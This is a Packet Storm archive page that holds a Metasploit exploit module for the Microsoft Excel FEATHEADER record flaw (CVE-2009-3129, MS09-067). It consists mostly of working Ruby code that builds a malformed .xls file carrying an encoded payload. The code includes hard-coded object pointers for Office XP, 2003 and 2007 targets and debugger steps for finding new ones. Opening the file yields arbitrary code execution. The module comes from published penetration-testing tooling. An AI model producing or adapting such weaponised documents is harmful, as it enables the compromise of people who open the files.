what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Microsoft Excel Malformed FEATHEADER Record Vulnerability

Microsoft Excel Malformed FEATHEADER Record Vulnerability
Posted Feb 15, 2010
Authored by Sean Larsson, jduck | Site metasploit.com

This Metasploit module exploits a vulnerability in the handling of the FEATHEADER record by Microsoft Excel. Revisions of Office XP and later prior to the release of the MS09-067 bulletin are vulnerable. When processing a FEATHEADER (Shared Feature) record, Microsoft used a data structure from the file to calculate a pointer offset without doing proper validation. Attacker supplied data is then used to calculate the location of an object, and in turn a virtual function call. This results in arbitrary code exection. NOTE: On some versions of Office, the user will need to dismiss a warning dialog prior to the payload executing.

tags | exploit, arbitrary
advisories | CVE-2009-3129
SHA-256 | 9b3639959e436c2af63dd333ef3f91333a796f538dda29fc89a0fd315c002e96

Microsoft Excel Malformed FEATHEADER Record Vulnerability

Change Mirror Download
##
# $Id: ms09_067_excel_featheader.rb 8474 2010-02-13 06:57:58Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/ole'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Excel Malformed FEATHEADER Record Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of the FEATHEADER record
by Microsoft Excel. Revisions of Office XP and later prior to the release of the
MS09-067 bulletin are vulnerable.

When processing a FEATHEADER (Shared Feature) record, Microsoft used a data
structure from the file to calculate a pointer offset without doing proper
validation. Attacker supplied data is then used to calculate the location of an
object, and in turn a virtual function call. This results in arbitrary code
exection.

NOTE: On some versions of Office, the user will need to dismiss a warning dialog
prior to the payload executing.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Sean Larsson', # original discovery
'jduck'
],
'Version' => '$Revision: 8474 $',
'References' =>
[
[ 'CVE','2009-3129' ],
[ 'OSVDB', '59860' ],
[ 'MSB', 'MS09-067' ],
[ 'BID', '36945' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-083/' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=832' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true # no need
},
'Platform' => 'win',
'Targets' =>
[
#
# To find new targets, generate the file using the debug target and execute
# the following in windbg:
#
# 0:000> s -b 0 L?-1 04 00 00 00 ee ff c0 da
#
# Use the largest number + 9 (should be in the 0x30xxxxxx range)
#

# Office v10.6854.6845, excel.exe v10.0.6854.0
[ 'Microsoft Office 2002 (XP) SP3 English on Windows XP SP3 English',
{ 'ObjPtr' => 0x308082d0 }
],

# Office v11.5612.5606, excel.exe v11.0.5612.0
[ 'Microsoft Office 2003 SP0 English on Windows XP SP3 English',
{ 'ObjPtr' => 0x3085d430 }
],

# Office v12.0.6425.1000, excel.exe v12.0.6425.1000
[ 'Microsoft Office 2007 SP2 English on Windows XP SP3 English',
{ 'ObjPtr' => 0x30f69018 }
],

# crash on a deref path to heaven.
[ 'Crash Target for Debugging',
{ 'ObjPtr' => 0xdac0ffee }
]
],
'DisclosureDate' => 'Nov 10 2009'))

register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'msf.xls']),
], self.class)
end

def add_record(tag, data=nil)
ret = ""
ret << Rex::OLE::Util.pack16(tag)
data ||= ''
ret << Rex::OLE::Util.pack16(data.length)
ret << data
ret
end

def exploit

# build the Workbook stream
ptr1 = target['ObjPtr']
ptr2 = ptr1 + 4
ptr3 = ptr2 + 4
ptr4 = ptr3 + 4

bofdata = ""
bofdata << Rex::OLE::Util.pack16(0x0600)
bofdata << Rex::OLE::Util.pack16(0x0005)
bofdata << Rex::OLE::Util.pack16(0x1faa)
bofdata << Rex::OLE::Util.pack16(0x07cd)
bofdata << Rex::OLE::Util.pack32(0x000100c1)
bofdata << Rex::OLE::Util.pack32(0x00000406)

feathdr = ""
feathdr << Rex::OLE::Util.pack16(0x0867) # frt
feathdr << "\x00" * (10)
feathdr << Rex::OLE::Util.pack16(0x0004) # isf
feathdr << "\x01" # reserved
feathdr << Rex::OLE::Util.pack32(0x00000004) # cbHdrData
feathdr << [ptr1].pack('V')
feathdr << rand_text_alphanumeric(1) # alignment
feathdr << [ptr2].pack('V')
feathdr << [ptr3 - 0x28].pack('V')
feathdr << [ptr4].pack('V')
#feathdr << "\xcc"
feathdr << payload.encoded

content = ""
content << add_record(0x0809, bofdata)
content << add_record(0x0867, feathdr)
content << add_record(0x000a)

print_status("Creating Excel spreadsheet ...")

out = File.expand_path(File.join(datastore['OUTPUTPATH'], datastore['FILENAME']))
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
if (not stg)
raise RuntimeError, 'Unable to create output file'
end
stm = stg.create_stream("Workbook")
if (not stm)
raise RuntimeError, 'Unable to create workbook stream'
end
stm << content
stm.close
stg.close

print_status("Generated output file #{out}")

end

end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close